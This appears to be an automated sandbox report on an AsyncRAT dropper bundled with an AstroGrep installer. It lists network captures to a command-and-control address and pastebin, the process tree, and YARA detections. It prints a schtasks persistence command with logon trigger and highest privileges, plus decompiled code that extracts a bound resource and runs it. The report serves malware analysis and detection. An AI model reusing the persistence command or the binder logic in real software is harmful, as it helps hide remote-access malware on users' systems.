                                                                                                          Jul 17, 2021 22:38:51.523821115 CEST4974457667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:51.576775074 CEST5766749744185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:38:56.588562012 CEST49727443192.168.2.3104.23.98.190
                                                                                                          Jul 17, 2021 22:38:56.642539024 CEST44349727104.23.98.190192.168.2.3
                                                                                                          Jul 17, 2021 22:38:56.642585039 CEST44349727104.23.98.190192.168.2.3
                                                                                                          Jul 17, 2021 22:38:56.642721891 CEST49727443192.168.2.3104.23.98.190
                                                                                                          Jul 17, 2021 22:38:56.645734072 CEST4974557667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:56.697777987 CEST5766749745185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:38:57.211591005 CEST4974557667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:57.263406038 CEST5766749745185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:38:57.774169922 CEST4974557667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:57.826600075 CEST5766749745185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:39:02.839700937 CEST49727443192.168.2.3104.23.98.190
                                                                                                          Jul 17, 2021 22:39:02.920731068 CEST44349727104.23.98.190192.168.2.3
                                                                                                          Jul 17, 2021 22:39:02.920764923 CEST44349727104.23.98.190192.168.2.3
                                                                                                          Jul 17, 2021 22:39:02.921053886 CEST49727443192.168.2.3104.23.98.190
                                                                                                          Jul 17, 2021 22:39:02.923373938 CEST4974657667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:39:02.978770018 CEST5766749746185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:39:03.493395090 CEST4974657667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:39:03.545262098 CEST5766749746185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:39:04.055896044 CEST4974657667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:39:04.108259916 CEST5766749746185.195.232.251192.168.2.3

                                                                                                          UDP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jul 17, 2021 22:36:53.337261915 CEST5128153192.168.2.38.8.8.8
                                                                                                          Jul 17, 2021 22:36:53.389234066 CEST53512818.8.8.8192.168.2.3
                                                                                                          Jul 17, 2021 22:36:54.775937080 CEST4919953192.168.2.38.8.8.8
                                                                                                          Jul 17, 2021 22:36:54.826328993 CEST53491998.8.8.8192.168.2.3
                                                                                                          Jul 17, 2021 22:36:54.838499069 CEST5062053192.168.2.38.8.8.8
                                                                                                          Jul 17, 2021 22:36:54.897867918 CEST53506208.8.8.8192.168.2.3
                                                                                                          Jul 17, 2021 22:36:55.527915001 CEST6493853192.168.2.38.8.8.8
                                                                                                          Jul 17, 2021 22:36:55.585128069 CEST53649388.8.8.8192.168.2.3
                                                                                                          Jul 17, 2021 22:36:56.656438112 CEST6015253192.168.2.38.8.8.8
                                                                                                          Jul 17, 2021 22:36:56.717106104 CEST53601528.8.8.8192.168.2.3
                                                                                                          Jul 17, 2021 22:36:57.466645956 CEST5754453192.168.2.38.8.8.8
                                                                                                          Jul 17, 2021 22:36:57.516228914 CEST53575448.8.8.8192.168.2.3
                                                                                                          Jul 17, 2021 22:36:59.017065048 CEST5598453192.168.2.38.8.8.8
                                                                                                          Jul 17, 2021 22:36:59.077357054 CEST53559848.8.8.8192.168.2.3
                                                                                                          Jul 17, 2021 22:36:59.952503920 CEST6418553192.168.2.38.8.8.8
                                                                                                          Jul 17, 2021 22:37:00.003014088 CEST53641858.8.8.8192.168.2.3
                                                                                                          Jul 17, 2021 22:37:00.708069086 CEST6511053192.168.2.38.8.8.8
                                                                                                          Jul 17, 2021 22:37:00.757761002 CEST53651108.8.8.8192.168.2.3
                                                                                                          Jul 17, 2021 22:37:01.655906916 CEST5836153192.168.2.38.8.8.8
                                                                                                          Jul 17, 2021 22:37:01.708547115 CEST53583618.8.8.8192.168.2.3
                                                                                                          Jul 17, 2021 22:37:02.530281067 CEST6349253192.168.2.38.8.8.8
                                                                                                          Jul 17, 2021 22:37:02.587483883 CEST53634928.8.8.8192.168.2.3
                                                                                                          Jul 17, 2021 22:37:03.445619106 CEST6083153192.168.2.38.8.8.8
                                                                                                          Jul 17, 2021 22:37:03.498022079 CEST53608318.8.8.8192.168.2.3
                                                                                                          Jul 17, 2021 22:37:04.334237099 CEST6010053192.168.2.38.8.8.8
                                                                                                          Jul 17, 2021 22:37:04.391597986 CEST53601008.8.8.8192.168.2.3
                                                                                                          Jul 17, 2021 22:37:05.231472969 CEST5319553192.168.2.38.8.8.8
                                                                                                          Jul 17, 2021 22:37:05.291542053 CEST53531958.8.8.8192.168.2.3
                                                                                                          Jul 17, 2021 22:37:06.570487022 CEST5014153192.168.2.38.8.8.8
                                                                                                          Jul 17, 2021 22:37:06.620836973 CEST53501418.8.8.8192.168.2.3
                                                                                                          Jul 17, 2021 22:37:07.516176939 CEST5302353192.168.2.38.8.8.8
                                                                                                          Jul 17, 2021 22:37:07.578461885 CEST53530238.8.8.8192.168.2.3
                                                                                                          Jul 17, 2021 22:37:08.355201960 CEST4956353192.168.2.38.8.8.8
                                                                                                          Jul 17, 2021 22:37:08.408332109 CEST53495638.8.8.8192.168.2.3
                                                                                                          Jul 17, 2021 22:37:09.262511969 CEST5135253192.168.2.38.8.8.8
                                                                                                          Jul 17, 2021 22:37:09.315294981 CEST53513528.8.8.8192.168.2.3
                                                                                                          Jul 17, 2021 22:37:10.390789986 CEST5934953192.168.2.38.8.8.8
                                                                                                          Jul 17, 2021 22:37:10.440526962 CEST53593498.8.8.8192.168.2.3
                                                                                                          Jul 17, 2021 22:37:11.292854071 CEST5708453192.168.2.38.8.8.8
                                                                                                          Jul 17, 2021 22:37:11.350147963 CEST53570848.8.8.8192.168.2.3
                                                                                                          Jul 17, 2021 22:37:28.351500988 CEST5882353192.168.2.38.8.8.8
                                                                                                          Jul 17, 2021 22:37:28.410435915 CEST53588238.8.8.8192.168.2.3
                                                                                                          Jul 17, 2021 22:37:32.554102898 CEST5756853192.168.2.38.8.8.8
                                                                                                          Jul 17, 2021 22:37:32.615664005 CEST53575688.8.8.8192.168.2.3
                                                                                                          Jul 17, 2021 22:37:45.202723980 CEST5054053192.168.2.38.8.8.8
                                                                                                          Jul 17, 2021 22:37:45.279752970 CEST53505408.8.8.8192.168.2.3
                                                                                                          Jul 17, 2021 22:37:53.417326927 CEST5436653192.168.2.38.8.8.8
                                                                                                          Jul 17, 2021 22:37:53.476236105 CEST53543668.8.8.8192.168.2.3
                                                                                                          Jul 17, 2021 22:38:02.662139893 CEST5303453192.168.2.38.8.8.8
                                                                                                          Jul 17, 2021 22:38:02.732795954 CEST53530348.8.8.8192.168.2.3
                                                                                                          Jul 17, 2021 22:38:05.182640076 CEST5776253192.168.2.38.8.8.8
                                                                                                          Jul 17, 2021 22:38:05.244585037 CEST53577628.8.8.8192.168.2.3
                                                                                                          Jul 17, 2021 22:38:37.332838058 CEST5543553192.168.2.38.8.8.8
                                                                                                          Jul 17, 2021 22:38:37.399772882 CEST53554358.8.8.8192.168.2.3
                                                                                                          Jul 17, 2021 22:38:40.676698923 CEST5071353192.168.2.38.8.8.8
                                                                                                          Jul 17, 2021 22:38:40.737597942 CEST53507138.8.8.8192.168.2.3

                                                                                                          DNS Queries

                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                          Jul 17, 2021 22:37:53.417326927 CEST192.168.2.38.8.8.80xaf53Standard query (0)pastebin.comA (IP address)IN (0x0001)

                                                                                                          DNS Answers

                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                          Jul 17, 2021 22:37:53.476236105 CEST8.8.8.8192.168.2.30xaf53No error (0)pastebin.com104.23.98.190A (IP address)IN (0x0001)
                                                                                                          Jul 17, 2021 22:37:53.476236105 CEST8.8.8.8192.168.2.30xaf53No error (0)pastebin.com104.23.99.190A (IP address)IN (0x0001)

                                                                                                          HTTPS Packets

                                                                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                          Jul 17, 2021 22:37:53.622780085 CEST104.23.98.190443192.168.2.349727CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IESat Jul 17 02:00:00 CEST 2021 Mon Jan 27 13:46:39 CET 2020Sun Jul 17 01:59:59 CEST 2022 Wed Jan 01 00:59:59 CET 2025769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                                                                          CN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:46:39 CET 2020Wed Jan 01 00:59:59 CET 2025

                                                                                                          Code Manipulations

                                                                                                          Statistics

                                                                                                          CPU Usage

                                                                                                          Click to jump to process

                                                                                                          Memory Usage

                                                                                                          Click to jump to process

                                                                                                          High Level Behavior Distribution

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          Analysis Process: ms.exe PID: 4156 Parent PID: 5584

                                                                                                          General

                                                                                                          Start time:22:36:58
                                                                                                          Start date:17/07/2021
                                                                                                          Path:C:\Users\user\Desktop\ms.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:'C:\Users\user\Desktop\ms.exe'
                                                                                                          Imagebase:0xa30000
                                                                                                          File size:1068032 bytes
                                                                                                          MD5 hash:DBBB611DAF3ABD47972AE4FAF5D54C95
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000001.00000000.195464436.0000000000A3F000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                          Reputation:low

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: ASTRO-GREP.EXE PID: 5416 Parent PID: 4156

                                                                                                          General

                                                                                                          Start time:22:37:00
                                                                                                          Start date:17/07/2021
                                                                                                          Path:C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:'C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE'
                                                                                                          Imagebase:0x5f0000
                                                                                                          File size:48640 bytes
                                                                                                          MD5 hash:432F0E0AAB658DE046D8B41D2CEF8253
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000002.250713765.0000000002A4E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000000.197769647.00000000005F2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000002.250001680.00000000005F2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE, Author: Joe Security
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 100%, Avira
                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                          Reputation:low

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: ASTROGREP_SETUP_V4.4.7.EXE PID: 3728 Parent PID: 4156

                                                                                                          General

                                                                                                          Start time:22:37:00
                                                                                                          Start date:17/07/2021
                                                                                                          Path:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:'C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE'
                                                                                                          Imagebase:0x400000
                                                                                                          File size:950654 bytes
                                                                                                          MD5 hash:A708211241313FEAF9621E571631534D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 5%, Metadefender, Browse
                                                                                                          • Detection: 4%, ReversingLabs
                                                                                                          Reputation:low

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: cmd.exe PID: 912 Parent PID: 5416

                                                                                                          General

                                                                                                          Start time:22:37:23
                                                                                                          Start date:17/07/2021
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:'C:\Windows\System32\cmd.exe' /c schtasks /create /f /sc onlogon /rl highest /tn 'astro-grep' /tr ''C:\Users\user\AppData\Roaming\astro-grep.exe'' & exit
                                                                                                          Imagebase:0xbd0000
                                                                                                          File size:232960 bytes
                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: conhost.exe PID: 3820 Parent PID: 912

                                                                                                          General

                                                                                                          Start time:22:37:24
                                                                                                          Start date:17/07/2021
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6b2800000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: cmd.exe PID: 3352 Parent PID: 5416

                                                                                                          General

                                                                                                          Start time:22:37:24
                                                                                                          Start date:17/07/2021
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmp7B21.tmp.bat''
                                                                                                          Imagebase:0xbd0000
                                                                                                          File size:232960 bytes
                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: conhost.exe PID: 784 Parent PID: 3352

                                                                                                          General

                                                                                                          Start time:22:37:24
                                                                                                          Start date:17/07/2021
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6b2800000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: schtasks.exe PID: 5996 Parent PID: 912

                                                                                                          General

                                                                                                          Start time:22:37:24
                                                                                                          Start date:17/07/2021
                                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:schtasks /create /f /sc onlogon /rl highest /tn 'astro-grep' /tr ''C:\Users\user\AppData\Roaming\astro-grep.exe''
                                                                                                          Imagebase:0xcb0000
                                                                                                          File size:185856 bytes
                                                                                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: timeout.exe PID: 1364 Parent PID: 3352

                                                                                                          General

                                                                                                          Start time:22:37:25
                                                                                                          Start date:17/07/2021
                                                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:timeout 3
                                                                                                          Imagebase:0x1020000
                                                                                                          File size:26112 bytes
                                                                                                          MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: astro-grep.exe PID: 748 Parent PID: 528

                                                                                                          General

                                                                                                          Start time:22:37:25
                                                                                                          Start date:17/07/2021
                                                                                                          Path:C:\Users\user\AppData\Roaming\astro-grep.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Users\user\AppData\Roaming\astro-grep.exe
                                                                                                          Imagebase:0x770000
                                                                                                          File size:48640 bytes
                                                                                                          MD5 hash:432F0E0AAB658DE046D8B41D2CEF8253
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000D.00000000.253043295.0000000000772000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000D.00000002.460832273.0000000000772000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\astro-grep.exe, Author: Joe Security
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 100%, Avira
                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                          Reputation:low

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: astro-grep.exe PID: 2792 Parent PID: 3352

                                                                                                          General

                                                                                                          Start time:22:37:29
                                                                                                          Start date:17/07/2021
                                                                                                          Path:C:\Users\user\AppData\Roaming\astro-grep.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:'C:\Users\user\AppData\Roaming\astro-grep.exe'
                                                                                                          Imagebase:0x430000
                                                                                                          File size:48640 bytes
                                                                                                          MD5 hash:432F0E0AAB658DE046D8B41D2CEF8253
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000011.00000002.310239259.0000000000432000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000011.00000000.259955019.0000000000432000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                          Reputation:low

                                                                                                          Chronological Activities

                                                                                                          Disassembly

                                                                                                          Code Analysis

                                                                                                          Reset < >

                                                                                                            Analysis Process: ms.exe PID: 4156 Parent PID: 5584 ms.exeCOMMON

                                                                                                            Executed Functions

                                                                                                            Function 00A310C0, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 181fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 75%
                                                                                                            			E00A310C0(void* __eflags, CHAR* _a8, void* _a12) {
				void* _v8;
				char _v16;
				signed int _v20;
				char _v279;
				char _v280;
				intOrPtr _v288;
				void* _v292;
				CHAR* _v308;
				intOrPtr _v316;
				intOrPtr _v320;
				char _v336;
				CHAR* _v340;
				CHAR* _v344;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				signed int _t49;
				intOrPtr* _t54;
				void* _t55;
				unsigned int _t56;
				void* _t59;
				CHAR* _t63;
				void* _t66;
				long _t67;
				intOrPtr _t72;
				void* _t86;
				char _t88;
				void _t89;
				void _t90;
				signed int _t92;
				void _t97;
				void* _t106;
				void* _t107;
				void* _t108;
				void* _t113;
				void* _t115;
				void* _t121;
				void* _t123;
				void* _t128;
				struct HRSRC__* _t131;
				intOrPtr _t132;
				void* _t133;
				signed int _t134;
				void* _t135;
				void* _t137;
				void* _t139;

				_push(0xffffffff);
				_push(E00A385CB);
				_push( *[fs:0x0]);
				_t48 =  *0xa3d07c; // 0xa189a5e1
				_t49 = _t48 ^ _t134;
				_v20 = _t49;
				_push(_t49);
				 *[fs:0x0] =  &_v16;
				_t113 = _a12;
				_v344 = _a8;
				_v340 = _t113;
				_v280 = 0;
				E00A357C0( &_v279, 0, 0x103);
				_t137 = _t135 - 0x148 + 0xc;
				E00A323A0( &_v279,  &_v336);
				_v8 = 0;
				_t54 = E00A32370( &_v279,  &_v308);
				if( *((intOrPtr*)(_t54 + 0x14)) >= 0x10) {
					_t54 =  *_t54;
				}
				_t106 =  &_v280 - _t54;
				do {
					_t88 =  *_t54;
					 *((char*)(_t106 + _t54)) = _t88;
					_t54 = _t54 + 1;
				} while (_t88 != 0);
				if(_v288 >= 0x10) {
					_push(_v308);
					E00A32BB1();
					_t137 = _t137 + 4;
				}
				_t55 = _t113;
				_t107 = _t113;
				do {
					_t89 =  *_t55;
					_t55 = _t55 + 1;
				} while (_t89 != 0);
				_t56 = _t55 - _t107;
				_t115 =  &_v280 - 1;
				do {
					_t90 =  *(_t115 + 1);
					_t115 = _t115 + 1;
				} while (_t90 != 0);
				_t92 = _t56 >> 2;
				_t128 = _t107;
				_t59 = memcpy(_t128 + _t92 + _t92, _t128, memcpy(_t115, _t128, _t92 << 2) & 0x00000003);
				_t139 = _t137 + 0x18;
				_v288 = 0xf;
				_v292 = 0;
				_v308 = 0;
				_t108 = _t59 + 1;
				do {
					_t97 =  *_t59;
					_t59 = _t59 + 1;
				} while (_t97 != 0);
				E00A31420( &_v280, _t59 - _t108,  &_v308);
				_t63 = _v308;
				if(_v288 < 0x10) {
					_t63 =  &_v308;
				}
				OutputDebugStringA(_t63); // executed
				if(_v288 >= 0x10) {
					_push(_v308);
					E00A32BB1();
					_t139 = _t139 + 4;
				}
				_t131 = FindResourceA(0, _v340, _v344);
				_t66 = CreateFileA( &_v280, 0x40000000, 2, 0, 2, 0x80, 0); // executed
				_t121 = _t66;
				_t67 = SizeofResource(0, _t131);
				WriteFile(_t121, LockResource(LoadResource(0, _t131)), _t67, _v340, 0); // executed
				FindCloseChangeNotification(_t121); // executed
				_t132 = _v320;
				_t72 = _t132;
				if(_t132 >= 1) {
					_t72 = 1;
				}
				_t110 = _v336;
				if(_v316 < 0x10) {
					_t110 =  &_v336;
				}
				if(E00A31040(_t72, "2", _t110) != 0 || _t132 < 1 || (0 | _t132 != 0x00000001) != 0) {
					_t110 =  &_v280;
					ShellExecuteA(0, "open",  &_v280, 0, 0, 5); // executed
				}
				if(_v316 >= 0x10) {
					_push(_v336);
					E00A32BB1();
				}
				 *[fs:0x0] = _v16;
				_pop(_t123);
				_pop(_t133);
				_pop(_t86);
				return E00A32701(1, _t86, _v20 ^ _t134, _t110, _t123, _t133);
			}


















































                                                                                                            0x00a310c3
                                                                                                            0x00a310c5
                                                                                                            0x00a310d0
                                                                                                            0x00a310d7
                                                                                                            0x00a310dc
                                                                                                            0x00a310de
                                                                                                            0x00a310e4
                                                                                                            0x00a310e8
                                                                                                            0x00a310f1
                                                                                                            0x00a31103
                                                                                                            0x00a31109
                                                                                                            0x00a3110f
                                                                                                            0x00a31115
                                                                                                            0x00a3111a
                                                                                                            0x00a31123
                                                                                                            0x00a3112e
                                                                                                            0x00a31131
                                                                                                            0x00a3113e
                                                                                                            0x00a31140
                                                                                                            0x00a31140
                                                                                                            0x00a31148
                                                                                                            0x00a31150
                                                                                                            0x00a31150
                                                                                                            0x00a31152
                                                                                                            0x00a31155
                                                                                                            0x00a31156
                                                                                                            0x00a31160
                                                                                                            0x00a31168
                                                                                                            0x00a31169
                                                                                                            0x00a3116e
                                                                                                            0x00a3116e
                                                                                                            0x00a31171
                                                                                                            0x00a31173
                                                                                                            0x00a31175
                                                                                                            0x00a31175
                                                                                                            0x00a31177
                                                                                                            0x00a31178
                                                                                                            0x00a31182
                                                                                                            0x00a31184
                                                                                                            0x00a31185
                                                                                                            0x00a31185
                                                                                                            0x00a31188
                                                                                                            0x00a31189
                                                                                                            0x00a3118f
                                                                                                            0x00a31192
                                                                                                            0x00a311a1
                                                                                                            0x00a311a1
                                                                                                            0x00a311a3
                                                                                                            0x00a311ad
                                                                                                            0x00a311b3
                                                                                                            0x00a311b9
                                                                                                            0x00a311c0
                                                                                                            0x00a311c0
                                                                                                            0x00a311c2
                                                                                                            0x00a311c3
                                                                                                            0x00a311d7
                                                                                                            0x00a311dc
                                                                                                            0x00a311ed
                                                                                                            0x00a311ef
                                                                                                            0x00a311ef
                                                                                                            0x00a311f6
                                                                                                            0x00a31202
                                                                                                            0x00a3120a
                                                                                                            0x00a3120b
                                                                                                            0x00a31210
                                                                                                            0x00a31210
                                                                                                            0x00a31233
                                                                                                            0x00a31241
                                                                                                            0x00a31251
                                                                                                            0x00a31253
                                                                                                            0x00a3126b
                                                                                                            0x00a31272
                                                                                                            0x00a31278
                                                                                                            0x00a3127e
                                                                                                            0x00a31283
                                                                                                            0x00a31285
                                                                                                            0x00a31285
                                                                                                            0x00a3128a
                                                                                                            0x00a3129b
                                                                                                            0x00a3129d
                                                                                                            0x00a3129d
                                                                                                            0x00a312af
                                                                                                            0x00a312c6
                                                                                                            0x00a312d3
                                                                                                            0x00a312d3
                                                                                                            0x00a312df
                                                                                                            0x00a312e7
                                                                                                            0x00a312e8
                                                                                                            0x00a312ed
                                                                                                            0x00a312f8
                                                                                                            0x00a31300
                                                                                                            0x00a31301
                                                                                                            0x00a31302
                                                                                                            0x00a31310

                                                                                                            APIs
                                                                                                            • _memset.LIBCMT ref: 00A31115
                                                                                                            • OutputDebugStringA.KERNELBASE(?), ref: 00A311F6
                                                                                                            • FindResourceA.KERNEL32(00000000,?,?), ref: 00A31222
                                                                                                            • CreateFileA.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00A31241
                                                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00A31253
                                                                                                            • LoadResource.KERNEL32(00000000,00000000,00000000), ref: 00A3125C
                                                                                                            • LockResource.KERNEL32(00000000), ref: 00A31263
                                                                                                            • WriteFile.KERNELBASE(00000000,00000000), ref: 00A3126B
                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00A31272
                                                                                                            • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 00A312D3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FileFind$ChangeCloseCreateDebugExecuteLoadLockNotificationOutputShellSizeofStringWrite_memset
                                                                                                            • String ID: open
                                                                                                            • API String ID: 1625157610-2758837156
                                                                                                            • Opcode ID: eb6387db3f50aa28b11f11d6bb36d4699130fa29febeb7bc822e2a47f5d7e822
                                                                                                            • Instruction ID: 07e7debc00a721cb128bd775668185acef4da90e6844f43cfc224992d4c9e531
                                                                                                            • Opcode Fuzzy Hash: eb6387db3f50aa28b11f11d6bb36d4699130fa29febeb7bc822e2a47f5d7e822
                                                                                                            • Instruction Fuzzy Hash: EF61B171D002289FCB25DBA4CD89BEBB7B9FB49700F0445A9F909A7200D7705E85CF90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00A31320, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 25libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00A31320(intOrPtr __edx) {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t5;
				intOrPtr _t8;

				_t8 = __edx;
				_t1 = LoadLibraryA("shell32.dll");
				 *0xa3e940 = _t1;
				if(_t1 == 0) {
					_t1 = E00A32E90(_t1);
				}
				_t2 = GetProcAddress(_t1, "ShellExecuteA");
				 *0xa3e944 = _t2;
				if(__imp__ShellExecuteA == 0) {
					E00A32E90(0); // executed
				}
				E00A31EB0(_t8, __imp__ShellExecuteA); // executed
				EnumResourceNamesA(0, "RBIND", E00A310C0, 0);
				_t5 =  *0xa3e940; // 0x760b0000
				return FreeLibrary(_t5);
			}







                                                                                                            0x00a31320
                                                                                                            0x00a31325
                                                                                                            0x00a3132b
                                                                                                            0x00a31332
